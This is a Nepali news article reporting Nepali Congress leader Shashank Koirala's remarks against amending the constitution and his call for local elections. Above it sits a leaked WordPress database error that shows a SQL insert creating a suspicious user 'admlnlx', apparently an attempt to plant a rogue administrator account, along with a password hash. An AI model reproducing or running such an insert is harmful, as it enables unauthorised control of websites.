WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRpcW5ObpFpv7rhxapzbRZPmBbW972/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 10:02:27', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २४-
नेपाली कांग्रेसका महामन्त्री डा शंशाक कोइरालाले पार्टीका केही मान्छेले भन्दैमा संविधान संशोधन गर्न नमिल्ने बताएका छन्।
रफत सञ्चार क्लवमा आयोजित कार्यक्रममा बोल्दै महामन्त्री डा कोइरालाले कांग्रेस हिमाल, पहाड र तराईलाई छुट्याएर संघीय प्रदेश बनाउनुपर्छ भन्ने पक्षमा नरहेको भन्दै पार्टीका केही नेताले भन्दैमा संविधान संशोधन गर्न नसकिने बताएका हुन्। ‘संविधान संशोधन गर्न दुई तिहाई बहुमतको आवश्यक पर्छ, कांग्रेस पहाडलाई विभाजन गरेर संघीय प्रदेश बनाउने पक्षमा छैन,’ उनले भने।
उनले पाँच नम्बर प्रदेशलाई पहाडबाट विभाजन गर्दा सामाजिक एकता तथा सद्भावना खल्बलीने बताउँदै मधेशी मोर्चाले भन्दैमा कांग्रेस संविधान संशोधनमा नलाग्ने बताए।पहिला स्थानीय निकायको निर्वाचन गरेर प्रदेश हुँदै प्रतिनिधिसभाको निर्वाचन आगामी ७ माघ २०७४ सालसम्म जसरी पनि गर्नुपर्ने भएकाले मधेशी मोर्चालाई दुई तिहाई बहुमत पुर्याएर संविधान संशोधन गरेर देखाउन चेतावनी दिए।
‘अहिलेको संविधान ९२ प्रतिशत सभासद्ले पारित गरेको संविधान हो। विश्वमै सबैभन्दा बढी बहुमतले बनाएको संविधानलाई अल्पमतले भन्दैमा संशोधन संशोधन गर्न सकिन्न,’ उनले भने।उनले निर्वाचन नभए संविधान असफल हुने भन्दै तत्काल निर्वाचनमा होमिन कार्यकर्तालाई निर्देशन दिएका छन्।
कोइरालाले सरकारले ०७४ माघ ७ गते भित्र तीन तहको निर्वाचन गर्न नसके संविधान पूर्ण रूपमा असफल हुने दाबी गरेका हुन्।सरकारले निर्णय गरेबमोजिम जेठ १० गते भित्र कुनै पनि हालतमा स्थानीय निकायको निर्वाचन गर्नुपर्ने उनले बताए। उनले कांग्रेस स्थानीय निकायको निर्वाचन गरेर मात्र संविधान संशोधन गर्नुपर्छ भन्ने पक्षमा रहेको बताउँदै सबै नेता तथा कार्यकर्तालाई स्थानीय निर्वाचनमा होमिन आग्रहसमेत गरे।
यसैबीच महामन्त्री कोइरालाले पाटी महाधिवेशन भएको डेढ वर्ष भइसक्दा पनि पार्टीमा पदाधिकारीले पूर्णता नपाउनु विडम्बना भएको बताए। ‘छिटै पार्टी पदाधिकारीले पूर्णता पाउनेछ,’ उनले भने,‘सभापतिले छिटै पूर्णता दिने वचन दिइरहेकाले पदाधिकारीले पूर्णता पाउनेछ।’